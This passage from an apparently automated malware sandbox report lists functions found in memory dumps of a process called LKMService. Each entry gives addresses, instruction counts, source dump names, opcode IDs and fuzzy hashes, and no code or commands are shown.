                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5938d4d609314abedbce5d26e46a58a1ba618b3863aae0b47408b3e79d029fac
                                                                                                                                                                                                                                            • Instruction ID: 2305a958cf781a2c4f1f3144f3f9e1f8d72f51cd9a80d724bd9b01ec859b65e4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5938d4d609314abedbce5d26e46a58a1ba618b3863aae0b47408b3e79d029fac
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6511671E00218DFEB14CFAAD9407DEBBF5BB88714F148129D819E7354EBB49846CB90
                                                                                                                                                                                                                                            Function 058B8688 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f4a407de90207cf4a9d4005e0fe0298a676d321b25b98f4f3fe34c6d00ff49da
                                                                                                                                                                                                                                            • Instruction ID: e4a201b9ef85a7f95eab01bcfa599a67728a04e598f9bb86af2d92d07ba3f93d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4a407de90207cf4a9d4005e0fe0298a676d321b25b98f4f3fe34c6d00ff49da
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB41D135F10149DFEB14CB78D595AAEBBFEAB89605F14846AE802EB350DAB0DC01CF45
                                                                                                                                                                                                                                            Function 058B621C Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5d9cbba252a1a5fbc660d7b1f86f7b7b173a28832127399b2ce5f97d51236c19
                                                                                                                                                                                                                                            • Instruction ID: 0c88d76f21437b36723a9e931c78263e0bb17dc82b842322b67b43dfe8ef06da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d9cbba252a1a5fbc660d7b1f86f7b7b173a28832127399b2ce5f97d51236c19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7413770E002599FEB14CFAAC950BDEBBF5BB48704F148129E819E7350EBB49946CF91
                                                                                                                                                                                                                                            Function 058B3188 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8dd92ec3187a5fce7a9eb8d623b4f986f9a3e9f8a92575bbba2adc5a5e87cd50
                                                                                                                                                                                                                                            • Instruction ID: ab5e8de5ff5dc5db6eecd8805872caec5d36540f638980ba0038987f3b959523
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dd92ec3187a5fce7a9eb8d623b4f986f9a3e9f8a92575bbba2adc5a5e87cd50
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7131043031834AC7FB68AA7989512BB649FABC12057108D3FAD53CF794DDA4CD0647A2
                                                                                                                                                                                                                                            Function 058B3179 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9dd8cba9fdb74b62fa03e375d0054f56b4192fb8f77bcbb0322bb6e07379568e
                                                                                                                                                                                                                                            • Instruction ID: eb8c990e8765c48ce3a5f1ba00b8686451967cca4b6fa10fe041caafd089a0c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dd8cba9fdb74b62fa03e375d0054f56b4192fb8f77bcbb0322bb6e07379568e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E31363031830ACBF768AA7988512BB699FABC22057104C7FAD53CF390DDA4CC0647A2
                                                                                                                                                                                                                                            Function 058B75C8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 41e2dd0ead2f7e2f7274781d9eba857e071e5f9c8a5f674513d544858c116b8b
                                                                                                                                                                                                                                            • Instruction ID: 0de4088eef51ba15feff9059fb6a0097f01f010a552a0ba282ffdb5e9c928304
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41e2dd0ead2f7e2f7274781d9eba857e071e5f9c8a5f674513d544858c116b8b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1831F574A00259CFDB04CFACD98499DBBF6FF89314B058291E446EB362D670ED06CB91
                                                                                                                                                                                                                                            Function 058BA7AC Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e649f44f6c3054c983f03c432ebb5309dca19dbbd720a6befb3fa75c45427fe3
                                                                                                                                                                                                                                            • Instruction ID: 3fb3cf666c9fe43a731112f78ab75813b007357743a9f2619edc1d9b86986bb0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e649f44f6c3054c983f03c432ebb5309dca19dbbd720a6befb3fa75c45427fe3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26312770D012499FEB14CFA9C595AEEBFF5AF48340F248029E909AB350DB749946CFA0
                                                                                                                                                                                                                                            Function 058B33C0 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c21f90f98d1bb9a51c016e1fd6d72e36d0b914b68df292378b04343ba6ee2d82
                                                                                                                                                                                                                                            • Instruction ID: ff5e09aa3e02185472950288797975f625c87e41a2c32a785450d3e85c32ac41
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c21f90f98d1bb9a51c016e1fd6d72e36d0b914b68df292378b04343ba6ee2d82
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC416D30A0021BCBDB14DFA5E54459EBBB6FF89308F108A29C405AB355EF749E46CFA1
                                                                                                                                                                                                                                            Function 058B33D0 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 641e79158930f0652e6fdf8bb69b9c7620788ba837200b4e56baf0a6a929ba86
                                                                                                                                                                                                                                            • Instruction ID: fb6d4872168c6c7f6fa43e141bbefb4b51fb8221fdcb5edd410f0a8c1b321e8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 641e79158930f0652e6fdf8bb69b9c7620788ba837200b4e56baf0a6a929ba86
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2316030A0021BCBDB14DFA5E55459EBBB6FF89308F108A29C405AB355EF749E46CFA1
                                                                                                                                                                                                                                            Function 058BA7B8 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e55d0c9a079cd3f33b3051057dfbbc4d4237a5a4df16b9311adb03befec55f32
                                                                                                                                                                                                                                            • Instruction ID: c744f4377c80ef0f6b38b3779cc1eeb856ee2ba0a86e9b88dd2ec6c0a58642f6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e55d0c9a079cd3f33b3051057dfbbc4d4237a5a4df16b9311adb03befec55f32
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF312670D01249DFEB14CFA9C595AEEBFF5AF48340F248029E909AB350DB749945CFA0
                                                                                                                                                                                                                                            Function 058B7B90 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 25a0e101f594e1b0c79ab0bf020e42a653de5b67184210c2f350fc4062d41e56
                                                                                                                                                                                                                                            • Instruction ID: d8c224fbca191ed81ccc8f46478af5628290648953337c61ea1b7e2f96a4a33f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25a0e101f594e1b0c79ab0bf020e42a653de5b67184210c2f350fc4062d41e56
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 212135F3B14358CBF740CE68CC82AE9BB3EEBD22197895055DE02DB352D2A4DE058B14
                                                                                                                                                                                                                                            Function 058B63D8 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 73d4d29ac19a7e5547eac4b22b1db808948edc1a9b14872db0c6aeb9c35c0742
                                                                                                                                                                                                                                            • Instruction ID: fd787efda7f0a4746cec51ac4b0f7e6bcb74eda7235b2a4d3f618de5c11a3df7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73d4d29ac19a7e5547eac4b22b1db808948edc1a9b14872db0c6aeb9c35c0742
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D73105B1D01618DFEB14CFAAD850BDEFBF9AF48314F14802AE80AA7340D7756845CB51
                                                                                                                                                                                                                                            Function 0151D76C Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4561501132.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_151d000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a4de2efa915acc9c4278bf76513df7f07ca1e346faf36d04591ac08985c191e1
                                                                                                                                                                                                                                            • Instruction ID: 457252e59ebe47eb4b3d33999eccafaeba9eaddf175173cec6ceadfff1cebb34
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4de2efa915acc9c4278bf76513df7f07ca1e346faf36d04591ac08985c191e1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E321F472500244EFEB06DF54D9C4B2ABFB5FB84324F248569ED090F24AC33AD456CAA1
                                                                                                                                                                                                                                            Function 058B4141 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 838276c4130274b6f02ad1a6b93605fe2aee007f539722eb9a9ad671c9446576
                                                                                                                                                                                                                                            • Instruction ID: db3a9ea9cf141ffb51708d30d340d4b603a89ead42d5dbfc004aaf66ad03fc3f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 838276c4130274b6f02ad1a6b93605fe2aee007f539722eb9a9ad671c9446576
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 96213632E2021A9BDF04CF68D8010CDBBBBAF9A310F118616E912FB360E7B119458B41
                                                                                                                                                                                                                                            Function 058B0040 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 990ba754ccff1fe0d1ce045e586c607b060d1a40194b5f403d7b2360ae7ba1de
                                                                                                                                                                                                                                            • Instruction ID: 881cb4ab6389694e2754e69f59d55eadc795206d8275e88cbdeb1b963d85c667
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 990ba754ccff1fe0d1ce045e586c607b060d1a40194b5f403d7b2360ae7ba1de
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C721D330E10209DFE744CBA9E85869FBBBAFBC9200F40C46AD815DB345D6B5DD15C791
                                                                                                                                                                                                                                            Function 058B4150 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 42df05f6a00399d57d05c738dec834b17f7940a61e323581b0709fa64c9e0256
                                                                                                                                                                                                                                            • Instruction ID: 041de45c1897252801821aae1216dc131fe7dd36aafec7bc0d58e6741fa0180d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42df05f6a00399d57d05c738dec834b17f7940a61e323581b0709fa64c9e0256
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B213732E2021A9BDF04CF68D8410DEFBBB9FD9310F118626E912FB360E7B159458751
                                                                                                                                                                                                                                            Function 058BA138 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 82ba28992f9d574aff8223f1f39eb89a4edccdf319992d77e77365d1b044dc22
                                                                                                                                                                                                                                            • Instruction ID: da2a01ebb455e3e3006280c384179b0b642b862b9521284bd465160369f5d6b6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82ba28992f9d574aff8223f1f39eb89a4edccdf319992d77e77365d1b044dc22
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4511A231E007168BCB05ABB8D8500EFF7B2FFD6200711C75AE45ABB244EF3469568791
                                                                                                                                                                                                                                            Function 058B91E8 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f2e6b65c94a44fb72e6b3114fb0b76acd45b95f69683b781496927e77153fd50
                                                                                                                                                                                                                                            • Instruction ID: 96990c7e220b948d1aec75021a3cce1736e93f4e0c909a14305b883af2682ff6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2e6b65c94a44fb72e6b3114fb0b76acd45b95f69683b781496927e77153fd50
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B110832D1025AABDB04CBB8E8400DEF776EFC6300B254723E921F7260DB71691A8762
                                                                                                                                                                                                                                            Function 058B63D6 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5f7e96d2c6227953e1f55b857c3ac1ca1de0bde772c6dab555ce868da4513300
                                                                                                                                                                                                                                            • Instruction ID: ad4e115eb4a8ab6ad88c7035f43176b01cf34eb17ea50de5d0b2402d20340678
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f7e96d2c6227953e1f55b857c3ac1ca1de0bde772c6dab555ce868da4513300
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3021F4B0D00658DFEB14CFAAC894BDEBBF9AF48714F14802AE406E7340DB745845CB51
                                                                                                                                                                                                                                            Function 058B5B11 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bc6c56f515c4db5fa9292bb4c6800b0ae5d632a4d412c6e728c1820d072c9f47
                                                                                                                                                                                                                                            • Instruction ID: 6d7729f64f716264637b27ba6ba05e0d8cd87db60b8dce3bf1b95606b366b99c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc6c56f515c4db5fa9292bb4c6800b0ae5d632a4d412c6e728c1820d072c9f47
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9611B431E007068BCB15ABB4D8540AEF7B1FFDA200715C75AE45AAB245EF30A98587D1
                                                                                                                                                                                                                                            Function 058B82FF Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 90430f7536ebe54e24a6834f746c09f9680db5f4b7124ed197cee1b95ae8e434
                                                                                                                                                                                                                                            • Instruction ID: a892273907f3d5c9544f9df978899aa186b8bcee712368d2c153072d5ffdd318
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90430f7536ebe54e24a6834f746c09f9680db5f4b7124ed197cee1b95ae8e434
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF118F32E0461A9BCF04DBA8DC004EEFBB6EFCA310F118726D651B7150E770295ACBA1
                                                                                                                                                                                                                                            Function 058B556F Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 65ad3bee3149d6931177a0181f25d0aab721827c2b970daa684ed848b29a18ac
                                                                                                                                                                                                                                            • Instruction ID: f00a232d6ef06bdedca413962169fda339c023358a87a89b219bc85fc35fc9d6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ad3bee3149d6931177a0181f25d0aab721827c2b970daa684ed848b29a18ac
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1110833D202199BDB10CBA8D8444DEBBBAEFD5714F214726E121F7290EBB16A55C741
                                                                                                                                                                                                                                            Function 058B30B0 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fe2083393629e985a84951bc6bc6b1dd38546faf67c2e6af96a926e867114a20
                                                                                                                                                                                                                                            • Instruction ID: 42cc259acb45a2a5ca5eacb683b463a05a62088a1ed8e9113f5b465ad97bd01d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe2083393629e985a84951bc6bc6b1dd38546faf67c2e6af96a926e867114a20
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F211E732D1461A8BCB059BB9CC000DEBBBAEFCA310F168A26D551B7260EB706959C791
                                                                                                                                                                                                                                            Function 058B5361 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d32e52f266488b285498507207093f2c8229c95bd7f02317329b24d8331fb0dd
                                                                                                                                                                                                                                            • Instruction ID: 3b173e900075c169f4ecd35977897d9d6e111d7ffe12d7dbe53e8762b4aa9fae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d32e52f266488b285498507207093f2c8229c95bd7f02317329b24d8331fb0dd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F110431710224CBEB18DA64C8156EE77FAFB89304F10482DD901EF394DBB59D01C792
                                                                                                                                                                                                                                            Function 058BB7F8 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.4659669167.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_58b0000_LKMService.jbxd
